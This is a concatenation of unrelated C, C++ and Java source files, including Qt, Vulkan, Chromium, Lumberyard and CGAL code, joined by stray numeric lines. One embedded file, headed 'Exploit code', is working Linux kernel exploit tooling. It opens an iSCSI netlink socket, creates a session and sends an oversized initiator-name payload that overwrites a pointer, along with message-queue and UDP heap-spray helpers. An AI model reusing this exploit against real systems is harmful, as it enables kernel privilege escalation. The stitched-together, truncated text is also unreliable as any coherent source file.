CONST_DRAG_BORDER_SIZE) { return true; } return false; } bool FramelessWindow::rightBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); int tmp = rect.x() + rect.width(); if (pos.x() <= tmp && pos.x() >= (tmp - CONST_DRAG_BORDER_SIZE)) { return true; } return false; } bool FramelessWindow::topBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); if (pos.y() >= rect.y() && pos.y() <= rect.y() + CONST_DRAG_BORDER_SIZE) { return true; } return false; } bool FramelessWindow::bottomBorderHit(const QPoint &pos) { const QRect &rect = this->geometry(); int tmp = rect.y() + rect.height(); if (pos.y() <= tmp && pos.y() >= (tmp - CONST_DRAG_BORDER_SIZE)) { return true; } return false; } void FramelessWindow::mousePressEvent(QMouseEvent *event) { if (isMaximized()) { return; } m_bMousePressed = true; m_StartGeometry = this->geometry(); QPoint globalMousePos = mapToGlobal(QPoint(event->x(), event->y())); if (leftBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { m_bDragTop = true; m_bDragLeft = true; setCursor(Qt::SizeFDiagCursor); } else if (rightBorderHit(globalMousePos) && topBorderHit(globalMousePos)) { m_bDragRight = true; m_bDragTop = true; setCursor(Qt::SizeBDiagCursor); } else if (leftBorderHit(globalMousePos) && bottomBorderHit(globalMousePos)) { m_bDragLeft = true; m_bDragBottom = true; setCursor(Qt::SizeBDiagCursor); } else { if (topBorderHit(globalMousePos)) { m_bDragTop = true; setCursor(Qt::SizeVerCursor); } else if (leftBorderHit(globalMousePos)) { m_bDragLeft = true; setCursor(Qt::SizeHorCursor); } else if (rightBorderHit(globalMousePos)) { m_bDragRight = true; setCursor(Qt::SizeHorCursor); } else if (bottomBorderHit(globalMousePos)) { m_bDragBottom = true; setCursor(Qt::SizeVerCursor); } } } void FramelessWindow::mouseReleaseEvent(QMouseEvent *event) { Q_UNUSED(event); if (isMaximized()) { return; } m_bMousePressed = false; bool bSwitchBackCursorNeeded = m_bDragTop || m_bDragLeft || m_bDragRight || m_bDragBottom; m_bDragTop = false; m_bDragLeft = false; m_bDragRight = false; m_bDragBottom = false; if (bSwitchBackCursorNeeded) { setCursor(Qt::ArrowCursor); } } bool FramelessWindow::eventFilter(QObject *obj, QEvent *event) { if (isMaximized()) { return QWidget::eventFilter(obj, event); } // check mouse move event when mouse is moved on any object if (event->type() == QEvent::MouseMove) { QMouseEvent *pMouse = dynamic_cast<QMouseEvent *>(event); if (pMouse) { checkBorderDragging(pMouse); } } // press is triggered only on frame window else if (event->type() == QEvent::MouseButtonPress && obj == this) { QMouseEvent *pMouse = dynamic_cast<QMouseEvent *>(event); if (pMouse) { mousePressEvent(pMouse); } } else if (event->type() == QEvent::MouseButtonRelease) { if (m_bMousePressed) { QMouseEvent *pMouse = dynamic_cast<QMouseEvent *>(event); if (pMouse) { mouseReleaseEvent(pMouse); } } } return QWidget::eventFilter(obj, event); }
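/*
 Illustrative usage sketch, not part of the original sources: hosting an
 ordinary widget inside the frameless window. The embedded QTextEdit and
 the window title are made up for the example.
*/
#include <QApplication>
#include <QTextEdit>
#include "framelesswindow.h"

int main(int argc, char *argv[]) {
  QApplication app(argc, argv);

  FramelessWindow window;
  window.setWindowTitle("frameless demo");
  window.setContent(new QTextEdit);  // any QWidget can be placed in the content area
  window.show();

  return app.exec();
}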
7,105
399
#pragma once #include "shared/vkFramework/Renderer.h" /** VkAccessFlags srcAccess, VkAccessFlags dstAccess, VkImageLayout oldLayout VkImageLayout newLayout // Before next stage (convert from ) ImageBarrier(ctx_, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_ACCESS_SHADER_READ_BIT, VK_IMAGE_LAYOUT_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL) // Return back to attachment ImageBarrier(ctx_, VK_ACCESS_SHADER_WRITE_BIT, VK_ACCESS_COLOR_ATTACHMENT_WRITE_BIT, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_ATTACHMENT_OPTIMAL) */ struct ShaderOptimalToColorBarrier : public Renderer { ShaderOptimalToColorBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL); } private: VulkanTexture tex_; }; struct ShaderOptimalToDepthBarrier : public Renderer { ShaderOptimalToDepthBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL); } private: VulkanTexture tex_; }; struct ColorToShaderOptimalBarrier : public Renderer { ColorToShaderOptimalBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL); } private: VulkanTexture tex_; }; struct ColorWaitBarrier : public Renderer { ColorWaitBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL); } private: VulkanTexture tex_; }; struct DepthToShaderOptimalBarrier : public Renderer { DepthToShaderOptimalBarrier(VulkanRenderContext& c, VulkanTexture tex): Renderer(c), tex_(tex) {} void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) override { transitionImageLayoutCmd(cmdBuffer, tex_.image.image, tex_.format, VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL, VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL); } private: VulkanTexture tex_; }; struct ImageBarrier : public Renderer { ImageBarrier(VulkanRenderContext& c, VkAccessFlags srcAccess, VkAccessFlags dstAccess, VkImageLayout oldLayout, VkImageLayout newLayout, VkImage image): Renderer(c), srcAccess_(srcAccess), dstAccess_(dstAccess), oldLayout_(oldLayout), newLayout_(newLayout), image_(image) {} virtual void fillCommandBuffer(VkCommandBuffer cmdBuffer, size_t currentImage, VkFramebuffer fb = VK_NULL_HANDLE, VkRenderPass rp = VK_NULL_HANDLE) { VkImageMemoryBarrier barrier = { .sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER, .pNext = 
nullptr, .srcAccessMask = srcAccess_, .dstAccessMask = dstAccess_, .oldLayout = oldLayout_, .newLayout = newLayout_, .srcQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED, .dstQueueFamilyIndex = VK_QUEUE_FAMILY_IGNORED, .image = image_, .subresourceRange = VkImageSubresourceRange { .aspectMask = VK_IMAGE_ASPECT_COLOR_BIT, .baseMipLevel = 0, .levelCount = 1, .baseArrayLayer = 0, .layerCount = 1 } }; vkCmdPipelineBarrier( cmdBuffer, VK_PIPELINE_STAGE_FRAGMENT_SHADER_BIT, VK_PIPELINE_STAGE_TOP_OF_PIPE_BIT, 0, 0, nullptr, 0, nullptr, 1, &barrier ); #if 0 VkImageMemoryBarrier/*2KHR*/ imageMemoryBarrier = { .sType = VK_STRUCTURE_TYPE_IMAGE_MEMORY_BARRIER, .pNext = nullptr, .srcStageMask = VK_PIPELINE_STAGE_2_COLOR_ATTACHMENT_OUTPUT_BIT_KHR, .srcAccessMask = VK_ACCESS_2_COLOR_ATTACHMENT_WRITE_BIT_KHR, .dstStageMask = VK_PIPELINE_STAGE_2_FRAGMENT_SHADER_BIT_KHR, .dstAccessMask = VK_ACCESS_2_SHADER_READ_BIT_KHR, .oldLayout = VK_IMAGE_LAYOUT_ATTACHMENT_OPTIMAL, .newLayout = VK_IMAGE_LAYOUT_READ_ONLY_OPTIMAL /* .image and .subresourceRange should identify image subresource accessed */}; vkCmdPipelineBarrier2KHR( ... 1, // imageMemoryBarrierCount &imageMemoryBarrier, // pImageMemoryBarriers ...); vkCmdPipelineBarrier(commandBuffer, VK_PIPELINE_STAGE_COMPUTE_SHADER_BIT, VK_PIPELINE_STAGE_HOST_BIT, 0, 1, &readoutBarrier, 0, nullptr, 0, nullptr); #endif } private: VkAccessFlags srcAccess_; VkAccessFlags dstAccess_; VkImageLayout oldLayout_; VkImageLayout newLayout_; VkImage image_; };
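/**
 Illustrative sketch, not part of the original header: how the transition
 helpers above might bracket an offscreen pass. The render context, the
 offscreen texture and the two passes are assumed to come from the
 surrounding vkFramework code; the sequencing is the point of the example.
*/
inline void recordOffscreenFrame(VulkanRenderContext& ctx, VulkanTexture offscreenColor,
	Renderer& scenePass, Renderer& postPass,
	VkCommandBuffer cmdBuffer, size_t currentImage)
{
	// make the texture writable as a color attachment for the scene pass
	ShaderOptimalToColorBarrier toAttachment(ctx, offscreenColor);
	// return it to a sampleable layout before the post-processing pass reads it
	ColorToShaderOptimalBarrier toShaderRead(ctx, offscreenColor);

	toAttachment.fillCommandBuffer(cmdBuffer, currentImage);
	scenePass.fillCommandBuffer(cmdBuffer, currentImage);
	toShaderRead.fillCommandBuffer(cmdBuffer, currentImage);
	postPass.fillCommandBuffer(cmdBuffer, currentImage);
}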
2,181
575
<filename>chrome/browser/web_applications/test/test_app_registrar.h // Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_WEB_APPLICATIONS_TEST_TEST_APP_REGISTRAR_H_ #define CHROME_BROWSER_WEB_APPLICATIONS_TEST_TEST_APP_REGISTRAR_H_ #include <map> #include <set> #include <string> #include <vector> #include "base/optional.h" #include "chrome/browser/web_applications/components/app_registrar.h" #include "chrome/browser/web_applications/components/web_app_constants.h" #include "chrome/browser/web_applications/components/web_app_id.h" #include "chrome/browser/web_applications/components/web_application_info.h" #include "components/services/app_service/public/cpp/url_handler_info.h" #include "url/gurl.h" namespace base { class Time; } namespace web_app { // Deprecated. Please use TestWebAppRegistryController instead. class TestAppRegistrar : public AppRegistrar { public: struct AppInfo { GURL install_url; ExternalInstallSource source = ExternalInstallSource::kExternalDefault; GURL launch_url; }; TestAppRegistrar(); ~TestAppRegistrar() override; // Adds |url| to the map of installed apps and returns the generated AppId. void AddExternalApp(const AppId& app_id, const AppInfo& info); // Removes an app from the map of installed apps. void RemoveExternalApp(const AppId& app_id); void RemoveExternalAppByInstallUrl(const GURL& install_url); // AppRegistrar bool IsInstalled(const AppId& app_id) const override; bool IsLocallyInstalled(const AppId& app_id) const override; bool WasInstalledByUser(const AppId& app_id) const override; bool WasInstalledByOem(const AppId& app_id) const override; std::map<AppId, GURL> GetExternallyInstalledApps( ExternalInstallSource install_source) const override; base::Optional<AppId> LookupExternalAppId( const GURL& install_url) const override; bool HasExternalAppWithInstallSource( const AppId& app_id, ExternalInstallSource install_source) const override; int CountUserInstalledApps() const override; std::string GetAppShortName(const AppId& app_id) const override; std::string GetAppDescription(const AppId& app_id) const override; base::Optional<SkColor> GetAppThemeColor(const AppId& app_id) const override; base::Optional<SkColor> GetAppBackgroundColor( const AppId& app_id) const override; const GURL& GetAppStartUrl(const AppId& app_id) const override; const std::string* GetAppLaunchQueryParams( const AppId& app_id) const override; const apps::ShareTarget* GetAppShareTarget( const AppId& app_id) const override; blink::mojom::CaptureLinks GetAppCaptureLinks( const AppId& app_id) const override; const apps::FileHandlers* GetAppFileHandlers( const AppId& app_id) const override; base::Optional<GURL> GetAppScopeInternal(const AppId& app_id) const override; DisplayMode GetAppDisplayMode(const AppId& app_id) const override; DisplayMode GetAppUserDisplayMode(const AppId& app_id) const override; std::vector<DisplayMode> GetAppDisplayModeOverride( const AppId& app_id) const override; apps::UrlHandlers GetAppUrlHandlers(const AppId& app_id) const override; GURL GetAppManifestUrl(const AppId& app_id) const override; base::Time GetAppLastBadgingTime(const AppId& app_id) const override; base::Time GetAppLastLaunchTime(const AppId& app_id) const override; base::Time GetAppInstallTime(const AppId& app_id) const override; std::vector<WebApplicationIconInfo> GetAppIconInfos( const AppId& app_id) const override; SortedSizesPx GetAppDownloadedIconSizesAny( const 
AppId& app_id) const override; std::vector<WebApplicationShortcutsMenuItemInfo> GetAppShortcutsMenuItemInfos( const AppId& app_id) const override; std::vector<IconSizes> GetAppDownloadedShortcutsMenuIconsSizes( const AppId& app_id) const override; RunOnOsLoginMode GetAppRunOnOsLoginMode(const AppId& app_id) const override; std::vector<AppId> GetAppIds() const override; WebAppRegistrar* AsWebAppRegistrar() override; private: std::map<AppId, AppInfo> installed_apps_; }; } // namespace web_app #endif // CHROME_BROWSER_WEB_APPLICATIONS_TEST_TEST_APP_REGISTRAR_H_
1,443
756
<gh_stars>100-1000 #define _GNU_SOURCE #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <linux/netlink.h> #include <sched.h> #include <stddef.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/msg.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/un.h> #include <syscall.h> #include <unistd.h> #include "iscsi_if.h" #include "common.h" unsigned char buf_padding[SPRAY0_BUF_LEN0]; /////////////////////////////////////////////////////////////////////////////// // File Functions ///////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int read_file(const char * filename, char * buffer, size_t length) { int fd, result; fd = open(filename, O_RDONLY); if(fd < 0) { printf("Failed to open file %s: (errno %d: %s)\n", filename, errno, strerror(errno)); return -1; } memset(buffer, 0, length); result = read(fd, buffer, length); close(fd); return result; } uint64_t get_uint64_from_file(const char * filename, int is_hex) { uint64_t ret = 0; char buffer[1024]; if(read_file(filename, buffer, sizeof(buffer)) < 0) return 0; if(is_hex) sscanf(buffer, "%lx", &ret); else sscanf(buffer, "%lu", &ret); return ret; } uint64_t get_tcp_transport_handle() { return get_uint64_from_file("/sys/class/iscsi_transport/tcp/handle", 0); } uint64_t get_iser_transport_handle() { return get_uint64_from_file("/sys/class/iscsi_transport/iser/handle", 0); } int iser_transport_handle_exists() { if ( access("/sys/class/iscsi_transport/iser/handle", R_OK ) == 0 ) { return 1; } else { return 0; } } int iscsi_get_file(int hostno) { char filename[256]; snprintf(filename, sizeof(filename), "/sys/class/iscsi_host/host%d/initiatorname", hostno); // leads to seq_read() call return open(filename, O_RDONLY); } /////////////////////////////////////////////////////////////////////////////// // Netlink Functions ////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// void read_response_error(int sock_fd, struct nlmsghdr * nlh, int exit_on_error) { struct iscsi_uevent * ev; struct iovec iov; struct msghdr msg; //Setup the iov and msghdr memset(nlh, 0, NLMSG_LENGTH(MSG_SIZE)); iov.iov_base = (void *)nlh; iov.iov_len = NLMSG_LENGTH(MSG_SIZE); memset(&msg, 0, sizeof(struct msghdr)); msg.msg_iov = &iov; msg.msg_iovlen = 1; if(recvmsg(sock_fd, &msg, 0) < 0) { printf("Couldn't get a reply message (errno %d: %s)\n", errno, strerror(errno)); exit(1); } if(exit_on_error) { ev = NLMSG_DATA(nlh); if(ev->type == ISCSI_KEVENT_IF_ERROR) { printf("Got error: if_error %d (%s)\n", ev->iferror, strerror(-ev->iferror)); exit(1); } } } void read_response(int sock_fd, struct nlmsghdr * nlh) { read_response_error(sock_fd, nlh, 0); } void send_netlink_msg_sized(int sock_fd, struct nlmsghdr * nlh, int size) { struct sockaddr_nl addr; struct iovec iov; struct msghdr msg; //Setup the port to send it to memset(&addr, 0, sizeof(addr)); addr.nl_family = AF_NETLINK; addr.nl_pid = 0; /* For Linux Kernel */ addr.nl_groups = 0; /* unicast */ //Set the flags that are always the same nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = NLM_F_REQUEST; //Setup the iov and msghdr iov.iov_base = (void *)nlh; iov.iov_len = size; memset(&msg, 0, sizeof(msg)); msg.msg_name = (void *)&addr; msg.msg_namelen = sizeof(addr); msg.msg_iov = &iov; msg.msg_iovlen = 1; if(sendmsg(sock_fd, &msg, 0) < 0) { 
printf("Failed to send message (errno %d: %s)\n", errno, strerror(errno)); exit(1); } } void send_netlink_msg(int sock_fd, struct nlmsghdr * nlh) { send_netlink_msg_sized(sock_fd, nlh, NLMSG_LENGTH(MSG_SIZE)); } /////////////////////////////////////////////////////////////////////////////// // UDP Functions ////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int init_server(struct sockaddr_in *si, int port) { int sock; int err; sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sock == -1) { perror("socket"); return -1; } memset(si, 0, sizeof(*si)); si->sin_family = AF_INET; si->sin_port = htons(port); si->sin_addr.s_addr = htonl(INADDR_ANY); err = bind(sock, (struct sockaddr *)si, sizeof(*si)); if (err == -1) { perror("bind"); close(sock); return -1; } int sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_SNDBUF, &sendbuff, sizeof(sendbuff)); sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &sendbuff, sizeof(sendbuff)); return sock; } int init_client(struct sockaddr_in *si, int port) { int sock; int err; sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sock == -1) { perror("socket"); return -1; } memset(si, 0, sizeof(*si)); si->sin_family = AF_INET; si->sin_port = htons(port); err = inet_aton("127.0.0.1", &si->sin_addr); if (err == -1) { perror("inet_aton"); close(sock); return -1; } int sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_SNDBUF, &sendbuff, sizeof(sendbuff)); sendbuff = 10*409600; setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &sendbuff, sizeof(sendbuff)); return sock; } int client_sendmsg(int sock, struct sockaddr_in *si, char *buf, size_t len) { struct iovec iov; struct msghdr mh; memset(&iov, 0, sizeof(iov)); memset(&mh, 0, sizeof(mh)); iov.iov_base = buf; iov.iov_len = len; mh.msg_name = si; mh.msg_namelen = sizeof(struct sockaddr); mh.msg_iov = &iov; mh.msg_iovlen = 1; mh.msg_control = NULL; mh.msg_controllen = 0; return sendmsg(sock, &mh, 0); } int init_msgq() { return msgget(IPC_PRIVATE, 0644 | IPC_CREAT); } struct msg { long mtype; /* message type, must be > 0 */ char mtext[2 * MSG_SIZE]; /* message data */ }; int msgq_send(int msgq_fd, char *buf, size_t len) { static struct msg m; if(len + sizeof(long) > sizeof(struct msg)) { printf("msgq_send buffer is not large enough for spray data (needs %lu, has %lu)\n", len, sizeof(struct msg)); exit(1); } m.mtype = 1; memcpy(&m.mtext, buf, len); return msgsnd(msgq_fd, &m, len, 0); } int msgq_recv(int msgq_fd) { struct msg m; return msgrcv(msgq_fd, &m, sizeof(m.mtext), 0, MSG_NOERROR); } /////////////////////////////////////////////////////////////////////////////// // Miscellaneous Functions///////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int bind_cpu() { cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set); if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0) { printf("Failed to set CPU affinity: errno %d (%s)\n", errno, strerror(errno)); exit(1); } } /////////////////////////////////////////////////////////////////////////////// // Exploit code /////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////// int setup_iscsi(int load_only, uint32_t *hostnop, uint32_t *sidp, int *sock_fdp, uint64_t *handlep) { struct sockaddr_nl addr; struct nlmsghdr *nlh = NULL; struct iscsi_uevent * ev; char * buffer, * payload; uint32_t hostno, sid; int i, sock_fd; 
uint64_t handle = 0; //Try to load the scsi_transport_iscsi and ib_iser modules sock_fd = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_RDMA); if(sock_fd >= 0) close(sock_fd); sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI); if(sock_fd < 0) { printf("Failed to get a NETLINK_ISCSI socket (errno %d: %s)\n", errno, strerror(errno)); return -1; } if(load_only) return 0; buffer = (void *)(nlh = (struct nlmsghdr *)malloc(NLMSG_LENGTH(MSG_SIZE))); if(!buffer) { printf("Failed to get memory for message buffer (errno %d: %s)\n", errno, strerror(errno)); return -1; } //Get the handle of a iscsi transport for(i = 0; handle == 0 && i < 5; i++) { if (iser_transport_handle_exists()) handle = get_iser_transport_handle(); if(handle == 0) { if (i == 0) printf("Waiting for iser_transport file to appear\n"); sleep(1); } } if(handle == 0) { printf("Failed to read an iscsi driver handle\n"); return -1; } printf("Got iscsi iser transport handle 0x%lx\n", handle); //Bind the socket memset(&addr, 0, sizeof(addr)); addr.nl_family = AF_NETLINK; addr.nl_pid = getpid(); bind(sock_fd, (struct sockaddr*)&addr, sizeof(addr)); //Setup the netlink message header memset(nlh, 0, NLMSG_LENGTH(MSG_SIZE)); nlh->nlmsg_len = NLMSG_LENGTH(MSG_SIZE); nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = NLM_F_REQUEST; nlh->nlmsg_type = ISCSI_UEVENT_CREATE_SESSION; //Send the create session message ev = (struct iscsi_uevent *)NLMSG_DATA(nlh); ev->type = ISCSI_UEVENT_CREATE_SESSION; ev->iferror = 0; ev->transport_handle = handle; send_netlink_msg(sock_fd, nlh); //Read the response to get the sid and hostno read_response(sock_fd, nlh); sid = ev->r.c_session_ret.sid; hostno = ev->r.c_session_ret.host_no; //printf("Success - sid %u - hostno %u\n", sid, hostno); free(buffer); //Save to the output parameters and return *hostnop = hostno; *sidp = sid; *sock_fdp = sock_fd; *handlep = handle; return 0; } int setup_overflow(uint32_t hostno, int sock_fd, uint64_t handle) { struct nlmsghdr *nlh = NULL; struct iscsi_uevent * ev = NULL; char * payload = NULL; nlh = (struct nlmsghdr *)malloc(NLMSG_LENGTH(MSG_SIZE)); if(!nlh) { printf("Failed to get memory for message buffer (errno %d: %s)\n", errno, strerror(errno)); return -1; } //Setup the setting message memset(nlh, 0, NLMSG_LENGTH(4096 + 8 + sizeof(struct iscsi_uevent) + 1)); nlh->nlmsg_len = NLMSG_LENGTH(4096 + 8 + sizeof(struct iscsi_uevent) + 1); nlh->nlmsg_type = ISCSI_UEVENT_SET_HOST_PARAM; //Send the initiator setting message ev = (struct iscsi_uevent *)NLMSG_DATA(nlh); ev->type = ISCSI_UEVENT_SET_HOST_PARAM; ev->iferror = 0; ev->transport_handle = handle; ev->u.set_host_param.host_no = hostno; ev->u.set_host_param.param = ISCSI_HOST_PARAM_INITIATOR_NAME; //ev->u.set_host_param.len = 4096 + 8; //The len parameter isn't used, it uses the string length payload = ((void *)ev) + sizeof(struct iscsi_uevent); memset(payload, 0x41, 4096); *((uint64_t *)(&payload[4096])) = handle + TRANSPORT_STRUCT_OFFSET; payload[4096+8] = 0; send_netlink_msg(sock_fd, nlh); //Read the response to make sure we succeeded read_response(sock_fd, nlh); //printf("Set name successfully\n"); free(nlh); return 0; }
/* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ #include "HMDFramework_precompiled.h" #include <platform_impl.h> #include "HMDDebuggerComponent.h" #include "HMDLuaComponent.h" #ifdef VR_EDITOR #include "EditorVRPreviewComponent.h" #endif // VR_EDITOR #include <IGem.h> #include <AzFramework/Metrics/MetricsPlainTextNameRegistration.h> namespace HMDFramework { class HMDFrameworkModule : public CryHooksModule { public: AZ_RTTI(HMDFrameworkModule, "{57CFF7A2-A9D0-4D30-912E-4564C4DF19D3}", CryHooksModule); HMDFrameworkModule() : CryHooksModule() { // Push results of [MyComponent]::CreateDescriptor() into m_descriptors here. m_descriptors.insert(m_descriptors.end(), { HMDDebuggerComponent::CreateDescriptor(), AZ::VR::HMDLuaComponent::CreateDescriptor(), #ifdef VR_EDITOR AZ::VR::EditorVRPreviewComponent::CreateDescriptor(), #endif //VR_EDITOR }); // This is an internal Amazon gem, so register it's components for metrics tracking, otherwise the name of the component won't get sent back. // IF YOU ARE A THIRDPARTY WRITING A GEM, DO NOT REGISTER YOUR COMPONENTS WITH EditorMetricsComponentRegistrationBus AZStd::vector<AZ::Uuid> typeIds; typeIds.reserve(m_descriptors.size()); for (AZ::ComponentDescriptor* descriptor : m_descriptors) { typeIds.emplace_back(descriptor->GetUuid()); } EBUS_EVENT(AzFramework::MetricsPlainTextNameRegistrationBus, RegisterForNameSending, typeIds); } /** * Add required SystemComponents to the SystemEntity. */ AZ::ComponentTypeList GetRequiredSystemComponents() const override { return AZ::ComponentTypeList { azrtti_typeid<HMDDebuggerComponent>(), azrtti_typeid<AZ::VR::HMDLuaComponent>(), }; } }; } // DO NOT MODIFY THIS LINE UNLESS YOU RENAME THE GEM // The first parameter should be GemName_GemIdLower // The second should be the fully qualified name of the class above AZ_DECLARE_MODULE_CLASS(HMDFramework_24a3427048184feba39ba2cf75d45c4c, HMDFramework::HMDFrameworkModule)
<filename>backend/de.metas.ui.web.base/src/main/java/de/metas/ui/web/order/sales/purchasePlanning/process/PurchaseViewBasedProcess.java package de.metas.ui.web.order.sales.purchasePlanning.process; import de.metas.process.IProcessPrecondition; import de.metas.ui.web.order.sales.purchasePlanning.view.PurchaseRowChangeRequest; import de.metas.ui.web.order.sales.purchasePlanning.view.PurchaseRowId; import de.metas.ui.web.order.sales.purchasePlanning.view.PurchaseView; import de.metas.ui.web.process.adprocess.ViewBasedProcessTemplate; /* * #%L * metasfresh-webui-api * %% * Copyright (C) 2018 metas GmbH * %% * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as * published by the Free Software Foundation, either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program. If not, see * <http://www.gnu.org/licenses/gpl-2.0.html>. * #L% */ public abstract class PurchaseViewBasedProcess extends ViewBasedProcessTemplate implements IProcessPrecondition { @Override protected final PurchaseView getView() { return PurchaseView.cast(super.getView()); } protected final void patchViewRow(final PurchaseRowId rowId, final PurchaseRowChangeRequest rowChangeRequest) { getView().patchViewRow(rowId, rowChangeRequest); } }
package org.consenlabs.tokencore.testutils; import org.consenlabs.tokencore.wallet.KeystoreStorage; import java.io.File; /** * Created by xyz on 2018/4/8. */ public class LocalFileStorage implements KeystoreStorage { @Override public File getKeystoreDir() { return new File("/tmp/imtoken"); } }
/* * Copyright (c) 2019-2020, Broadcom * * SPDX-License-Identifier: BSD-3-Clause */ #ifndef BOARD_FAMILY_H #define BOARD_FAMILY_H #if defined(DRIVER_SPD_ENABLE) && !defined(DRIVER_SPD_SPOOF) #include <spd.h> #endif #ifdef USE_GPIO /* max number of supported GPIOs to construct the bitmap for board detection */ #define MAX_NR_GPIOS 4 /* max GPIO bitmap value */ #define MAX_GPIO_BITMAP_VAL (BIT(MAX_NR_GPIOS) - 1) #endif struct mcb_ref_group { uint32_t mcb_ref; unsigned int *mcb_cfg; }; #define MCB_REF_GROUP(ref) \ { \ .mcb_ref = 0x ## ref, \ .mcb_cfg = mcb_ ## ref, \ } #endif
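/*
 * Usage sketch for the MCB_REF_GROUP macro above: the macro pastes a hex
 * reference ID into both the numeric .mcb_ref field and the name of the
 * backing mcb_<ref> configuration array. The reference ID 1a2b and the
 * contents of the table below are hypothetical, not values taken from the
 * real Broadcom board code.
 */
static unsigned int mcb_1a2b[] = { 0u };

static struct mcb_ref_group board_refs[] = {
	MCB_REF_GROUP(1a2b), /* expands to { .mcb_ref = 0x1a2b, .mcb_cfg = mcb_1a2b } */
};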
<filename>BGL/include/CGAL/boost/graph/IO/Generic_facegraph_builder.h // Copyright (c) 2019 GeometryFactory // // This file is part of CGAL (www.cgal.org); // // $URL$ // $Id$ // SPDX-License-Identifier: LGPL-3.0-or-later OR LicenseRef-Commercial // // Author(s) : <NAME> // <NAME> #ifndef CGAL_BGL_IO_GENERIC_FACEGRAPH_BUILDER_H #define CGAL_BGL_IO_GENERIC_FACEGRAPH_BUILDER_H #include <CGAL/boost/graph/Euler_operations.h> #include <CGAL/boost/graph/named_params_helper.h> #include <iostream> #include <string> #include <vector> namespace CGAL{ namespace IO { namespace internal { template <typename Graph, typename Point, typename Derived> class Generic_facegraph_builder { protected: typedef std::vector<Point> Point_container; typedef typename Point_container::size_type size_type; typedef std::vector<std::size_t> Face; typedef std::vector<Face> Face_container; typedef typename boost::graph_traits<Graph>::vertex_descriptor vertex_descriptor; typedef typename boost::graph_traits<Graph>::face_descriptor face_descriptor; public: Generic_facegraph_builder(std::istream& in_) : 